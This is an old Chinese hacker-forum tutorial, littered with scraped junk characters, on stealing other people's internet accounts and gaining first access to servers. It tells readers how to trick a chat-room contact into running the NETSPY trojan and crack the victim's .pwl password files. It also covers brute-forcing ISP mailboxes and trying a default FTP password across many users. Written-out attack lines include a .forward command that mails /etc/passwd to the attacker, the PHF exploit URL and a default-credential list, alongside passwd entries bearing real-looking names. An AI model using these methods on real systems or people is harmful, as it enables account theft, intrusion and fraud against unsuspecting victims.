如何得到别人的上网帐号和密码,我在这里介绍几种弱智方法。1 k% f% }$ a3 U% W, f! o7 |5 _" Y/ a
方案一:利用特洛伊木马得到帐号。必备工具:NTESPY、PWLVIEW。
5 U. g. }3 Y" Q3 x! m优点:只要对方运行了程序就有80%的成功率,而且不需要任何网络入侵知识,只要能熟悉的操作上面两个软件即可。NETSPY是全中文软件,一看就会。而PWLVIEW又是弱智操作只要在DOS下输入PWLVIEW然后按回车即可。成功率高,操作简单而且用不了多长时间是它最大的优点,只是......
/ r# p! j& B- o# P4 q1 ]缺点:只有一个,那就是如何让对方乖乖的运行你的程序。+ e, b: l; Z% z" o- `& a4 J
提示:先问清你的目标和你是不是在一个城市。* _9 I2 b% m( ?$ F. a9 a' i; H
实战演戏:一天,我在X海聊天室里寻找目标,遇见了同在北京的色鹅丢丢。我上前打招呼:丢丢好呀。丢丢说:你好呀。我又说:XXXXXXX(客套话,先和他拉关系)对了,我拿到了一个新程序,要不要看看?丢丢说:好呀,寄给我吧。% _) P) ?) |% h5 b
哈哈,鱼上钩了!先把诱饵程序改个名,如改成readme之类的东东,然后和一些不相干的东西发过去,然后你让他先运行README。在这插一句,有一位大侠使用此法时,竟然把控制端程序和NETSPY的说明文件一起发了过去,真搞不懂他怎么想的。我对他说,你先运行README,是中文说明。丢丢说:好...咦,怎么没反映呀?(YEAH!)我又说:那你直接运行软件吧。丢丢说:好吧...不错...我说:明天见...开始干活,连上他的机子后,现在C盘里找到了WIN95的目录WINDOWS。也有可能是WIN95或WIN98,进入后查找*.pwl,然后把所有后缀名为PWL的文件都抓过来,放在你的工具PWLVIEW的子目录里。在DOS窗口下输入PWLVIEW然后敲回车,丢丢的上网帐号和密码就都显示出来了。而且以后如果他上网,NETSPY就会通知你,他就再也逃不出你的手掌心了。就算是他换了密码,你也能在2分钟内再把他搞定。! H% k) i7 n5 \+ ~# M2 K* Q [
忠告:你用他的帐号上网后第一件事就是先去查看他的上网时间。分析一下他一般几点上网以避免撞车。 D, Y. b, q* J- a, M- H, |
方案二:利用ISP的疏忽做文章举。例用工具:EMAILCRK或网络刺客
6 s: i3 C9 v1 A: I, j% |优点:没什么优点& z2 q3 z3 m. x
缺点:要具体情况具体对待,太麻烦
2 V* V+ n; d/ `1 l, p+ f W: X提示:平时多多留神。, m5 ]* N6 g( }4 B& l- L
譬如,某个ISP给你开好了帐号,然后又画蛇添足的给你一个邮箱,地址是:你的帐号@xxx.net- g3 p* P y; Q! x7 f/ a' ]
密码和你的上网密码一样。也就是说,只要你能敲开邮箱的密码就一切OK了。& F. w- l- ?* Y6 s4 x2 n
运行EMAILCRK或网络刺客,套上字典后就等着。一般没有XX个小时搞不定,不成功的可能性很大,而且破解时还必须要上网。你的机子要是快可以开上三四个窗口,套上不同的字典一起破* ]. s$ F _* V
方案三:侵入邮局主机然后把PASS档抓回来,然后用JOHN或JACK套上字典开始破。+ ^9 h, _+ T6 ~2 |
优点:一次可以破出好多帐号,而且如果运气好还能拿到ROOT,这个主机就要归你控制了。而且破解时不用上网,可以好几台机子一起破。
- I) w3 r! \! Y+ ]4 g. ?缺点:对于初学者有一定困难,尤其是只想拿一个上网帐号这样做恐怕会得不偿失。而且被发现的可能性很大,情节严重且性质恶劣,一定要慎重对待。
! w, D( w0 a) F* y Z3 o# v由于介绍此类的教学文章比较多,我就不班门弄斧了。 9 a& K+ d v6 a, M2 _7 K4 w
% M6 h8 ?( \3 a$ { V+ N
哈哈,我来说说最简单的入侵方法。其实入侵大体的原理相同,主要是利用系统的漏洞(BUG)来做文章。
. J& r" E3 m' {% {, o/ m" u只不过有的网站漏洞难找有的好找而已。一个好的黑客,就是要能很快的发现漏洞并加以利用。下面我给大家举一个小栗子。
) p( D4 D0 I) t; n有一天,我去XX热线申请主页,发现那里采用的是机器自动回信,信的大概格式如下:
0 `) _/ O) d' {* x' h& n4 P0 y( C/ G7 v4 u
------------------------------
0 Q) h, Y0 G9 m9 F7 k& ]$ f, T; [) N
XXX,你好(XX是你在表格上填的名字)
( k% h) j4 D+ ^1 ^你在XX热线的主页空间已开通
$ O" S1 Q, r% I, u6 C# V帐户名:XXX 密码:110 X" `) r- h$ p( H+ Y1 D9 ]
-----------XX热线
4 e! M: a& a6 e3 f6 C; V1 |7 A电话:XXXX-XXXXXXXX/ t+ l( }, L- {9 s/ Z; V5 h7 n
------------------------------
: s" X8 e4 w n1 w) N' X
8 l+ X& r* u5 e n" s7 ?好了,由于是机器回信,所以那里所有人的初始密码都是11,而且该热线要更改密码要TELNET到邮局主机去改,有许多网友并没有接触过如何T主机,所以他们使用的还是初始密码11。
' G7 K& X' T3 l2 d开始干活了,打开FTP软件,输入XX热线的IP,密码11,然后挨个输入帐户名。帐户名可去XX热线的主页空间列表里查看,先试试AAAA,。。。没成功,再换一个,AABB。。。还是不行。哈哈,这个用户名短,没准能行。输入AA。。。进去了。寄下用户名然后继续试,ABC。。。又成功了,看来没改密码的人很多呀。试几个就行了,现在,你已经拥有这些帐户的控制权了。
$ w& `; B. N& T% y \8 _上面的这个栗子很简单,一般象这么大的漏很难找。要侵入一个稍微象点话的站台就要耗费你大量的时间和金钱,而且还未必能成功。即使成功了,你不改它实在无趣,改了恐怕会步马X的后尘。此人侵入贵阳的主机并把界面换成了一张淫秽图片。害的自己吃饭不用花钱了。所以我在这里劝大家一句,把这方面的精力放到全心全意为人民服务上去。实在不行就去聊天室,看谁不听话就炸他,同样很过瘾的!
( \9 w* o7 U. f
: J$ Q5 o# ~$ ?# {+ E' c! x' I R# ]: b" _6 W, R L) U a# T2 D6 f
如何获得第一个帐号/ N2 g1 ]; I, H2 s9 \$ p1 {
5 W6 f4 b! v) D我们这种水平不高的黑客入侵都是先得到系统的一个有效帐号,进入后再利用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是利用系统漏洞还是得到SHADOW都是有一定规律可寻的,通常你到一些黑客站点找到对应系统相应版本的EXPLOIT编译后执行就行了.我感觉最困难的是获得第一个有效的帐号,有时侯费尽力气也得不到,后来总算是积累了一些经验,想写出来和大家交流一下,希望能抛砖引玉,请高手们把更好的方法告诉我.
5 d/ x/ }- I) U3 u4 ?) d
6 A5 Z6 M1 O3 B确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,帐号用ANONYMOUS或是FTP,密码用一个EMAIL帐号(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统帐号,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通帐号放进去,这就是很重要的信息,虽然只有帐号没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x,做一个.foward文件传上去,在UNIX下的命令应该是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后给匿名用户写一封信,它会把PASSWD发给你。
. y1 {7 r0 P. C/ d
% S; u) G5 J: a# g如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些帐号,有的网页上甚至列出了EMAIL通讯录,这对黑客来讲就是无价之宝.把这些帐号记下来,非常有用./ s+ T j& I% H3 Q2 S0 R
: K4 W: Z) I/ p以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://攻击目标/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-<
: r i4 [) ?; J3 N t( o
7 x8 |: c7 m$ q+ J: W7 K& p还可以利用目标的FINGER功能来积累帐号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了!$ q g1 G J* S
! c+ ^& ^, r: n) S% s7 M$ S! A S
很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的帐号,例如:, s3 P. F& x4 z! o" e6 u
# b7 }8 D; q, A) v+ @3 \2 p
帐号 密码
' q' l1 B4 t7 i0 Z& P% K3 w----------- ----------------
' ^% ?- l I( Y- B% A M2 @6 yroot root, L$ \ f0 s! u" G$ B& w1 D
sys sys/system/bin, j+ k( E8 U9 \8 o- H/ D3 {
bin sys/bin
5 I! n% O+ U! P5 j) ^6 Smountfsys mountfsys* A- H3 v- A2 D; e9 }
adm adm9 d1 f- k. F8 T1 _. L
uucp uucp
6 g+ F& t7 s1 E' O6 O; b& A- lnuucp anon% H* W$ X4 U0 c0 F( r
anon anon
g6 h" `3 {( J' C6 Ruser user3 ]* W# r3 e* a
games games- @9 m: H* J' d+ A( V4 c
install install
! C2 q7 w1 w( Yreboot 给 "command login" 用的8 E% q( {& j# ]* G1 ]4 R, h
demo demo& j Y; ^$ X8 Q! [& a
umountfsys umountfsys7 I- w1 w) |! |% b( ? G1 l; h
sync sync
% C3 k6 m, n/ s* h' [7 H1 P+ ]& r$ Y- Sadmin admin
7 e, G7 \8 u+ f: R1 g; O1 Kguest guest
5 s! k4 r/ U$ a6 v' }daemon daemon
" L! W1 M( L3 @; J5 u( y, W Z________________________________________________________________, H% k' ?& z) E+ I3 ^0 G
1 t& |2 n7 T/ \. i% F. i3 ?有些管理员忘记把他们改掉,那你就发财了!
4 \, N3 Z9 Y& G* a& \' }- v1 K" |1 }1 X$ D# ]
另外还有一些习惯性帐号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试.. _& r& }! G# T# O$ _
. P2 L; m- {" x) F8 S
只有帐号还不能进入系统,但有了帐号搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道帐号的那你应该会发现该用户的许多信息,例如:
4 D; @/ o; e) s) k7 B2 N
; f; T4 _! Q1 A5 w.........: U* d4 B& K9 D3 Y" N9 B
. D0 ]- F$ y; ?/ b4 x
xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh, S$ i S1 g* ~3 G
6 z7 a% Q) w g z l* u p
qingyuan:x:275:50::/usr/qingyuan:/bin/sh
) b9 a0 K# ^! q/ l$ v9 H
# U$ j) T( W: G$ t# c. ?4 N1 }hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh
6 t0 y1 L. b/ \! P7 Y
d3 n/ K4 g( [" X& }$ c7 e, M+ qsmlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh. R- b3 ?' i* N/ a6 ^2 U
) Q" |) |9 `; f P' Pkyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh, }' r( f$ v1 ^; N1 i
# q$ e# o4 r3 lbrlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh
" a. q. N) j- ?' B! s% U( r! _. f+ ~, i/ z* D9 W
tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh# J, \% c6 L, j {( u, P7 |
9 N, }8 m* I/ c5 k K............: d. [; N7 l6 [- ^4 S
$ n8 ]: P1 i" `* J1 X这是一部分PASSWD,从这儿我们可以得到七个帐号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的.1 H" ~1 w+ X( W
6 f8 V8 \. ^1 b! f2 p+ p如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜">如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜.
r' J1 f* s. \7 K
/ Z1 U' k6 V8 v, |. S; N- g当然最可能的密码还是帐号本身和一些帐号的变形,如帐号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的.3 g) I+ W3 G9 O0 s: \
' j9 x$ f0 Z. c$ |# K) {- w; m5 L如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好.+ P3 U% i5 o' t% s
( _+ \; E: W" f# h- J& U
最后实在不行还有一种比较卑劣的手段,就是给该网站的网管写封信,想办法骗他执行特洛伊木马,然后再.......算了,不说了.+ o) B" I1 F6 g! V& n6 B0 X6 J' I
" U8 E, H2 i, @# G U$ u
你可能发现以上这些方法都不能百分之百的成功,或者说成功率是比较低的,因为我也不知道更好的方法.但我感到一定有一种更好的方法,希望有高手见到此文能告诉我.! J% _8 A+ O9 G5 S
1 ^$ O6 M/ j3 B9 S2 |
|